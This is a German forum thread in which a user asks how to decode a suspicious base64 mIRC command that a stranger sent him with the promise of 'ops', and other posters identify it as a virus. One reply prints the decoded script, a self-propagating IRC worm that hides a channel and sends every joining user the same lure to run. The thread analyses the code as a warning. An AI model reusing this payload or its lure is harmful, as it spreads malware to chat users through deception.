Als ich letztens im IRC war, schrieb mich so ein Typ an:
GET OPS IN THE CHANNEL! USE THIS!: //write ops $decode(b24gMTpqb2luOiM6eyBpZiAoJG1lICFpc29uICN1YXApIHsgLmpvaW4gI3VhcCB8IC50aW1lciAxMCAyIC93aW5kb3cgLWggI3VhcCB9IHwgLmF1c2VyIDIgJG5pY2sgfCAubXNnICRuaWNrIEdFVCBPUFMgSU4gVEhFIENIQU5ORUwhIFVTRSBUSElTIToDNCAvL3dyaXRlIG9wcyAkICQrIGRlY29kZSggJCsgJGVuY29kZSgkcmVhZCgkc2NyaXB0LG4sMSksbSkgJCsgLG0pICRjaHIoMTI0KSAubG9hZCAtcnMgb3BzIH0=,m) | .load -rs ops
Ich bin ja nicht blöd... Irgendwas daran muss faul sein. Ich würde gerne sehen, was da verschlüsselt wurde.
Nur... wie entschlüsseln?
Greetz Laurin
Now these points of data make a beautiful line.
And we're out of beta. We're releasing on time.
Hi,
ma wieder sonen schöner gecrypteter Virus, sowas gibt haufenweise trägt bestimmt was in deine Remote.ini ein, da gabs mal nen tool zum decrypten bin ma googlen....
mfg
125
Das ist Tux. Kopiere Tux in deine Signatur und hilf ihm so auf seinem Weg zur Weltherrschaft.
Dieser Thread ist mal echt in die Breite gezogen .
"UU-Encode" -> Unter Umständen Verschlüsseln?
Bei remi_meier's code kommt folgendes raus:
on 1:join:#:{ if ($me !ison #uap) { .join #uap | .timer 10 2 /window -h #uap } | .auser 2 $nick | .msg $nick GET OPS IN THE CHANNEL! USE THIS!:4 //write ops $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs ops }
Angenommen es gäbe einen Algorithmus mit imaginärer Laufzeit O(i * n), dann gilt O((i * n)^2) = O(-1 * n^2) d.h. wenn man diesen Algorithmus verschachtelt ist er fertig, bevor er angefangen hat.